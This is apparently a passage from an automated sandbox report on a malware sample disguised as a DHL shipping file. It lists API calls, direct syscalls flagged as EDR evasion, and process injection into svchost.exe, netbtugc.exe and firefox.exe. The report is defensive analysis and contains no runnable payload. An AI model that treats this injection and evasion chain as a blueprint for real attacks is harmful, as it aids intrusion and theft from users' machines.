Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03BC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFAB40 mov eax, dword ptr fs:[00000030h]	2_2_03BFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD8B42 mov eax, dword ptr fs:[00000030h]	2_2_03BD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03B38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03B38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B86AA4 mov eax, dword ptr fs:[00000030h]	2_2_03B86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B68A90 mov edx, dword ptr fs:[00000030h]	2_2_03B68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04A80 mov eax, dword ptr fs:[00000030h]	2_2_03C04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03B6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03B6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30AD0 mov eax, dword ptr fs:[00000030h]	2_2_03B30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03B64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03B64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]	2_2_03B86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]	2_2_03B86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]	2_2_03B86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]	2_2_03B54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]	2_2_03B54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6CA38 mov eax, dword ptr fs:[00000030h]	2_2_03B6CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6CA24 mov eax, dword ptr fs:[00000030h]	2_2_03B6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5EA2E mov eax, dword ptr fs:[00000030h]	2_2_03B5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBCA11 mov eax, dword ptr fs:[00000030h]	2_2_03BBCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]	2_2_03BACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]	2_2_03BACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03B6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03B6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03B6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDEA60 mov eax, dword ptr fs:[00000030h]	2_2_03BDEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]	2_2_03B40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]	2_2_03B40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h]	2_2_03BB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03BB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03BB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]	2_2_03B309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]	2_2_03B309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]	2_2_03B629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]	2_2_03B629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]	2_2_03BBE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h]	2_2_03B649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]	2_2_03BFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h]	2_2_03BC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04940 mov eax, dword ptr fs:[00000030h]	2_2_03C04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h]	2_2_03BB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h]	2_2_03BC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h]	2_2_03BBC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]	2_2_03B28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]	2_2_03B28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]	2_2_03BAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]	2_2_03BAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]	2_2_03BD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]	2_2_03BD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h]	2_2_03BBC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]	2_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]	2_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]	2_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]	2_2_03B7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h]	2_2_03B7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]	2_2_03B7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h]	2_2_03BB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C008C0 mov eax, dword ptr fs:[00000030h]	2_2_03C008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h]	2_2_03BBC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h]	2_2_03B30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03B6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03B6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]	2_2_03BFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]	2_2_03B5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]	2_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]	2_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]	2_2_03B52835

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_00200B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00200B62

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001D2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001D2622
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001C083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001C083F
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001C09D5 SetUnhandledExceptionFilter,	0_2_001C09D5
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001C0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_001C0C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtCreateMutant: Direct from: 0x774635CC	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtWriteVirtualMemory: Direct from: 0x77462E3C	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtMapViewOfSection: Direct from: 0x77462D1C	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtResumeThread: Direct from: 0x774636AC	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtProtectVirtualMemory: Direct from: 0x77462F9C	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtSetInformationProcess: Direct from: 0x77462C5C	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtSetInformationThread: Direct from: 0x774563F9	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtProtectVirtualMemory: Direct from: 0x77457B2E	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtNotifyChangeKey: Direct from: 0x77463C2C	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtAllocateVirtualMemory: Direct from: 0x77462BFC	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtQueryInformationProcess: Direct from: 0x77462C26	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtResumeThread: Direct from: 0x77462FBC	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtReadFile: Direct from: 0x77462ADC	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtQuerySystemInformation: Direct from: 0x77462DFC	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtDelayExecution: Direct from: 0x77462DDC	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtOpenKeyEx: Direct from: 0x77463C9C	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtCreateUserProcess: Direct from: 0x7746371C	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtWriteVirtualMemory: Direct from: 0x7746490C	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtAllocateVirtualMemory: Direct from: 0x774648EC	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtQuerySystemInformation: Direct from: 0x774648CC	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtQueryVolumeInformationFile: Direct from: 0x77462F2C	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtReadVirtualMemory: Direct from: 0x77462E8C	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtCreateKey: Direct from: 0x77462C6C	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtSetInformationThread: Direct from: 0x77462B4C	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtQueryAttributesFile: Direct from: 0x77462E6C	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtDeviceIoControlFile: Direct from: 0x77462AEC	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtOpenSection: Direct from: 0x77462E0C	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtCreateFile: Direct from: 0x77462FEC	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtOpenFile: Direct from: 0x77462DCC	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtQueryInformationToken: Direct from: 0x77462CAC	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtTerminateThread: Direct from: 0x77462FCC	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtQueryValueKey: Direct from: 0x77462BEC	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	NtOpenKeyEx: Direct from: 0x77462B9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread register set: target process: 5040

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread APC queued: target process: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 307A008

Jump to behavior

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

0_2_00201201

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_001E2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_001E2BA5

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_0020B226 SendInput,keybd_event,

0_2_0020B226

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_002222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_002222DA

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 8350232025-1.exe"	Jump to behavior
Source: C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

0_2_00200B62

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_00201663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00201663

Source: DHL 8350232025-1.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: DHL 8350232025-1.exe, EBeVwyXzNOzYtNUOvQ.exe, 00000003.00000000.1525063714.0000000001790000.00000002.00000001.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000003.00000002.3912475053.0000000001790000.00000002.00000001.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000000.1673682221.0000000001AB0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
